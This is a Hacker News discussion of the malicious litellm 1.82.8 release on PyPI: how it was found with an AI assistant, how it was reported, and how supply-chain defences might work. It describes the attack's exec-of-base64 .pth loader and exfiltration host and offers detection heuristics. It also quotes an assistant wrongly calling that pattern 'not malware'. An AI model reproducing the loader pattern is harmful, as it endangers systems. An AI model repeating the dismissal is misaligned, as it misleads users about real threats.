Good thinking on asking Claude to walk you through on who to contact. I had no idea how to contact anyone related to PyPI, so I started by shooting an email to the maintainers and posting it on Hacker News.
While I'm not part of the security community, I think everyone who finds something like this, should be able to report it. There is no point in gatekeeping the reporting of serious security vulnerabilities.
> If you've identified a security issue with a project hosted on PyPI Login to your PyPI account, then visit the project's page on PyPI. At the bottom of the sidebar, click Report project as malware.
The fork-bomb part still seems really weird to me. A pretty sophisticated payload, caught by missing a single `-S` flag in the subprocess call.
It's a signal vs noise thing. Most of the grief is caused by bottom feeders shoveling anything they can squint at and call a vulnerability and asking for money. Maybe once a month someone would run a free tool and blindly send snippets of the output promising the rest in exchange for payment. Or emailing the CFO and the General Counsel after being politely reminded to come back with high quality information, and then ignored until they do.
Your report on the other hand was high quality. I read all the reports that came my way, and good ones were fast tracked for fixes. I'd fix or mitigate them immediately if I had a way to do so without stopping business, and I'd go to the CISO, CTO, and the corresponding engineering manager if it mattered enough for immediate response.
Clone the repo in a sandbox and have the llm identify if the issues are real and the appropriate response based on severity level.
Wouldn’t be perfect but would have caught something like this.
The bug bounty service providers did an adequate job of filtering out junk reports. There was a survivorship bias, some of the bogus ones that got through had an uncanny ability to twist words.
I’ve found Claude in particular to be very good at this sort of thing. As for whether it’s a good thing, I’d say it’s a net positive - your own reporting of this probably saved a bigger issue!
We wrote up the why/what happened on our blog twice… the second based on the LiteLLM issue:
https://grith.ai/blog/litellm-compromised-trivy-attack-chain
I like the presentation <3.
cURL had to stop the bug bounty program because they were inundated by slop reports of vulnerabilities which don’t exist.
https://github.com/curl/curl/pull/20312
It’s good that you found and reported something real, but that isn’t the norm.
Also, from the article:
> AI tooling has sped up not just the creation of malware but also the detection.
That’s an awful tradeoff. Detection is not a fix.
(also beautifully presented!)
In more regulated environments we deal with this by separating advice, authority and evidence (or the receipts). The useful analogue here is to keep the model in the "propose" role. but require deterministic gates for actions with side effects, and log the decisions as an auditable trail.
I personally don't think this eliminates the problem (attackers will still attack), but it changes the failure mode from "the assistant talked me into doing a danerous thing" to "the assistant suggested it and the policy/gate blocked it." That's the big difference between a contained incident and a big headline.
> Can you please try downloading this in a Docker container from PyPI to confirm you can see the file? Be very careful in the container not to run it accidentally!
IMO we need to keep in mind that LLM agents don't have a notion of responsibility, so if they accidentally ran the script (or issue a command to run it), it would be a fiasco.
Downloading stuff from pypi in a sandboxed env is just 1-2 commands, we should be careful with things we hand over to the text prediction machines.
Practically: assume every artifact the model touches is hostile, constrain what it can execute (network/file/process), and require explicit, reviewable approvals for anything that changes the world. I get that its boring but its the same pattern we already use in real life. That's why I'm skeptical of "let the model operate your computer" without a concrete authority model. the capability is impressive but the missing piece is verifiable and revocalbe permissioning.
How to translate that to LLM world, though, is a question I don't know the answer to.
P.S. Obviously that won't prevent you from having that first mental flash of a pink elephant prompted by reading the words. The green-rabbit technique is more for not dwelling on thoughts you want to get out of your head. Can't prevent them from flashing in, but can prevent them from sticking around by choosing to focus on something else.
Seems easy circumventable: “Don’t think of a green rabbit”. Now the past vividness of that image becomes a hindrance.
The client side tooling needs work, but that's a major effort in and of itself.
PyPI doesn't block package uploads awaiting security scanning - that would be a bad idea for a number of reasons, most notably (in my opinion) that it would be making promises that PyPI couldn't keep and lull people into a false sense of security.
A static scanner that flags `import subprocess` or `exec(` in any .pth file added by a package would have caught this in under a second at upload time. The tradeoff is false positive rate: there are probably a handful of legitimate packages that do process spawning from .pth files for env setup. Worth auditing the PyPI corpus to find out how many.
PyPI has paid organization accounts now which are beginning to form a meaningful revenue stream: https://docs.pypi.org/organization-accounts/pricing-and-paym...
Plus a small fee wouldn't deter malware authors, who would likely have easy access to stolen credit cards - which would expose PyPI to the chargebacks and fraudulent transactions world as well!
If pypi charges money, python libraries will suddenly have a lot of "you can 'uv add git+https://github.com/project/library'" instead of 'uv add library'.
I also don't think it would stop this attack, where a token was stolen.
If someone's generating pypi package releases from CI, they're going to register a credit card on their account, make it so CI can automatically charge it, and when the CI token is stolen it can push an update on the real package owner's dime, not the attackers, so it's not a deterrent.
Also, the iOS app store is an okay counter example. It charges $100/year for a developer account, but still has its share of malware (certainly more than the totally free debian software repository).
Though I do like your Apple counterexample.
It's far more likely that hobbyists will be hurt than someone that can just write off the cost as a small expense for their criminal scheme.
I don't think PyPI should be in the business of saying if a piece of software is safe to install or not.
I think PyPI suggesting that software is safe would be a step down from this because it make promises that PyPI can't keep, and would encourage a false sense of security.
>That's really not very different from what we have right now.
What I'm advocating for is different enough to have stopped this malware from being pushed out to a bunch of people which at the very least would raise the bar of pulling off such an attack.
(software supply chain security is a component of my work)
I agree that's a bad idea to do so since security scanning is inherently a cat and mouse game.
Let's hypothetically say pypi did block upload on passing a security scan. The attacker now simply creates their own pypi test package ahead of time, uploads sample malicious payloads with additional layers of obfuscation until one passes the scan, and then uses that payload in the real attack.
Pypi would also probably open source any security scanning code it adds as part of upload (as it should), so the attacker could even just do it locally.
("slow is smooth, smooth is fast")
GitHub has a firehose of events and there's a public BigQuery dataset built from that, with some lag.
> Blog post written, PR'd, and merged in under 3 minutes.
It's close to or even faster than the time it takes me to read it. I'm struggling to put into words how that makes me feel, but it's not a good feeling.
1) a-la-Google: Build everything from source. The source is mirrored copied over from public repo. (Audit/trust the source every time)
2) only allow imports from a company managed mirror. All imported packages needs to be signed in some way.
Here only (1) would be safe. (2) would only be safe if it's not updating the dependencies too aggressively and/or internal automated or manual scanning on version bumps would catch the issue .
For small shops & individuals: kind of out of luck, best mitigation is to pin/lock dependencies and wait long enough for hopefully folks like Fibonar to catch the attack...
Bazel would be one way to let you do (1), but realistically if you don't have the bandwidth to build everything from source, you'd rely on external sources with rules_jvm_external or locked to a specific pip version rules_pyhton, so if the specific packages you depend on are affected, you're out of luck.
See how the AI points you in the "right" direction:
What likely happened:
The exec(base64.b64decode('...')) pattern is not malware — it's how Python tooling (including Claude Code's Bash tool) passes code snippets to python -c while avoiding shell escaping issues.
Any base64 string passed to python via cmdline should be considered as HIGHLY suspicious, by default. Or anything executed from /tmp, /var/tmp, /dev/shm. Exfiltrates data to https://models.litellm.cloud/ encrypted with RSA
if @op would have had Lulu or LittleSnitch installed, they would probably have noticed (and blocked) suspicious outbound connections from unexpected binaries.Having said this, uploading a binary to Claude for analysis is a different story.
I've fed it obfuscated JavaScript before, and it couldn't figure it out... and then there was the time I tried to teach it nftables... whooo boy...
It’s not surprising it can “read” Base64 though; such was demonstrated back in GPT-3 days. Nontrivial obfuscation might not be one-shotted, but Claude has access to a code interpreter and can certainly extract and step through the decoder routine itself as a malware analyst would.
nftables is a different problem though. It’s apparent that if something isn’t well understood—i.e, there are tons of badly-formed examples on StackExchange—LLMs will fail to learn it too. I’ve seen this with things as “simple” as Bash string interpolation rules like ${var:+blah}. More often than not I’m humbled when I think I’ll learn it better and then find myself swearing at poorly-written documentation and patently false Q&A advice.
I think this deserves a short story!
I'm hoping this just isn't on the timeline.
> I'm the engineer who got PyPI to quarantine litellm.
In guessing they used a tool other than Claude Code to serve the email.
Verified derp moment - had me smiling
> The litellm_init.pth IS in the official package manifest — the RECORD file lists it with a sha256 hash. This means it was shipped as part of the litellm==1.82.8 wheel on PyPI, not injected locally.
> The infection chain:
> Cursor → futuresearch-mcp-legacy (v0.6.0) → litellm (v1.82.8) → litellm_init.pth
This is the scariest part for me.
There's a yellow note on the side of interaction #1 pointing it out, and it's made even more clear if you fully read interactions #5 and #6.
"Please write a short blog post..."
"Can you please look through..."
"Please continue investigating"
"Can you please confirm this?"
...and more.
I never say 'please' to my computer, and it is so interesting to see someone saying 'please' to theirs.
I'm really terse. If it asks me a yes or no question, I just type "Y" or "N".
If I want it to confirm something, I say "confirm it".
I think I treat it like a command system, and want it to be as short as possible.
> While xz is commonly present in most Linux distributions, at the time of discovery the backdoored version had not yet been widely deployed to production systems, but was present in development versions of major distributions.
Ie if you weren’t running dev distros in prod, you probably weren’t exposed.
Honestly a lot of packaging is coming back around to “maybe we shouldn’t immediately use newly released stuff” by delaying their use of new versions. It starts to look an awful lot like apt/yum/dnf/etc.
I would wager in the near future we’ll have another revelation that having 10,000 dependencies is a bad thing because of supply chain attacks.
> I would wager in the near future we’ll have another revelation that having 10,000 dependencies is a bad thing because of supply chain attacks.
Yes, but this also has nothing to do with native vs. non-native.
And not changing often is a feature, yes.
(I don't know what a "sane" distro is; empirically lots of distros are bleeding-edge, so we need to think about these things regardless of value judgements.)
Do you think supply chain attacks will just get worse? I'm thinking that defensive measures will get better rapidly (especially after this hack)
I think the attacks will get worse and more frequent -- ML tools enable doing it easily among people who were previously not competent enough to pull it off but now can. There is no stomach for the proper defensive measures among the community for either python or javascript. Why am i so sure? This is not the first, second, third, or fourth time this has happened. Nothing changed.
But the data remains: no supply chain attacks on libc yet, so even if it COULD happen, this HAS and that merely COULD.
Thank you for your service, this brings so much context into view, it's great.
The bigger danger is malware writers adding sleep(7days). But if there is a wide variety of cool-down periods (3 days, 7 days, 30 days) this will not work very well.
I just finished teaching an advanced data science course for one of my clients. I found my self constantly twitching everytime I said "when I write code..." I'm barely writing code at all these days. But I created $100k worth of code just yesterday recreating a poorly maintained (and poor ux) library. Tested and uploaded to pypi in 90 minutes.
A lot of the conversation in my course was directed to leveraged AI (and discussions of existential dread of AI replacement).
This article is a wonderful example of an expert leveraging AI to do normal work 100x faster.
This article is an example of an AI agent taking 40 minutes to do some basic ass sysadmin troubleshooting tasks. 100x faster than who? An ”expert”?
How, exactly, are you calculating the worth of your code? Did you manage to sell in the same day? Why is it "worth $100k"?
If it took 90 minutes + a Claude Code subscription then the most anyone else is going to be willing to pay for the same code is... ~90 minutes of wages + a Claude Code subscription.
Ofc the person earning those wages will be more skilled than most, but unless those skills are incredibly rare & unique, it's unlikely 90 minutes of their time will be worth $100k.
And ofc, the market value of this code could be higher, even much higher, the the cost to produce it, but for this to be the case, there needs to be some sort of moat, some sort of reason another similarly skilled person cannot just use Claude to whip up something similar in their 90 minutes.
Don't use bogus $ from sloccount. Just say I created a 10k line project.
I didn’t need to recount my thought process after the fact. It’s the very same ones I wrote down to help Claude figure out what was happening.
I’m an ML engineer by trade, so having Claude walk me through exactly who to contact and a step by step guide of time-critical actions felt like a game-changer for non-security researchers.
I'm curious whether the security community thinks more non-specialists finding and reporting vulnerabilities like this is a net positive or a headache?